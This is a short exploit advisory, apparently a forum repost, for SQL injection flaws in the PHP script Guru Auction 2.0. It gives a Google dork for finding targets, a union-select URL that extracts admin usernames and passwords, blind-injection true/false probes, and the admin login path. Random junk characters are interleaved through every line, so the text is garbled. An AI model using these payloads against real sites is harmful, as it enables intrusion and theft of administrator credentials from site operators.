Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
3 G* a; D- {" S- X. _/ w7 q% @7 V: k& b4 i. x) ]
作者 : v3n0m
9 g5 j. n* s0 H应用 : Guru Auction 2.0" k! u( h4 B3 x0 U5 I0 |
Price : $49" U, R+ U! C; ?: G
Vendor : http://www.guruscript.com/4 m3 L; H6 L5 ?1 _/ l) S
Google Dork : inurl:subcat.php?cate_id=3 W5 `* S# Q9 t; t
7 i- `& ^9 d% c$ u7 G
SQLi p0c:
2 G9 @/ q, L2 ~( K~~~~~~~~~~
! ]9 N0 n/ w, r0 Q4 n' \9 Ehttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--+ Z9 }6 O4 e1 Z" V/ q
; V; A3 O ^7 ^
5 b2 t: Y! {& `0 m盲注 p0c:% \ U$ _: A, \$ A$ e; z: k" D
~~~~~~~~~~
: G, M, `( v7 ?$ r }, jhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
+ |/ m5 c. A, r4 S- Jhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false1 V) |5 I& p% e; F
/ T" o9 V, m; m管理登录入口:
3 \/ c! w: o6 x+ ?+ o# x~~~~~~~~~~
& b7 b& b: {( n S0 y. f, dhttp://domain.tld/[path]/admin/
l% A' C) F+ {/ _4 w |